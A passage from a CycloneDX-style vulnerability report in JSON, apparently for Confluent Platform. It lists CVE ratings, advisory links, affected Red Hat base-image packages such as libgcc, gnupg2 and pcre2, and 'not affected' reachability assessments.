          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libgomp@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libgomp@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libgomp@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2022-27943",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.3,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        674
      ],
      "description": "libiberty/rust-demangle.c in GNU GCC 11.2 allows stack consumption in demangle_const, as demonstrated by nm-new.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2022-27943"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2022-27943"
        },
        {
          "url": "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=105039"
        },
        {
          "url": "https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=1a770b01ef415e114164b6151d1e55acdee09371"
        },
        {
          "url": "https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=9234cdca6ee88badfc00297e72f13dac4e540c79"
        },
        {
          "url": "https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=fc968115a742d9e4674d9725ce9c2106b91b6ead"
        },
        {
          "url": "https://gcc.gnu.org/pipermail/gcc-patches/2022-March/592244.html"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/H424YXGW7OKXS2NCAP35OP6Y4P4AW6VG/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-27943"
        },
        {
          "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=28995"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2022-27943"
        }
      ],
      "published": "2022-03-26T13:15:07+00:00",
      "updated": "2026-06-17T04:37:46+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "11.5.0-14.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libgomp@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "11.5.0-14.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "11.5.0-14.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libgomp@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libgomp@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libgomp@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libgomp@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libgomp@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libgomp@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libgomp@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libgomp@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libgomp@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libgomp@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libgomp@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libgomp@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libgomp@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libgomp@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libgomp@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libgcc@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libgomp@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-14.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2022-3219",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.2,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        787
      ],
      "description": "GnuPG can be made to spin on a relatively small input by (for example) crafting a public key with thousands of signatures attached, compressed down to just a few KB.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2022-3219"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2022-3219"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2127010"
        },
        {
          "url": "https://dev.gnupg.org/D556"
        },
        {
          "url": "https://dev.gnupg.org/T5993"
        },
        {
          "url": "https://marc.info/?l=oss-security&m=165696590211434&w=4"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-3219"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20230324-0001/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2022-3219"
        }
      ],
      "published": "2023-02-23T20:15:12+00:00",
      "updated": "2026-06-17T04:59:05+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.3.3-5.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2022-41409",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        190
      ],
      "description": "Integer overflow vulnerability in pcre2test before 10.41 allows attackers to cause a denial of service or other unspecified impacts via negative input.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2022-41409"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2022-41409"
        },
        {
          "url": "https://github.com/PCRE2Project/pcre2/commit/94e1c001761373b7d9450768aa15d04c25547a35"
        },
        {
          "url": "https://github.com/PCRE2Project/pcre2/issues/141"
        },
        {
          "url": "https://github.com/advisories/GHSA-4qfx-v7wh-3q4j"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41409"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2022-41409"
        }
      ],
      "published": "2023-07-18T14:15:12+00:00",
      "updated": "2026-06-17T05:03:09+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "10.40-6.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "10.40-6.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2023-30571",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H"
        }
      ],
      "cwes": [
        362
      ],
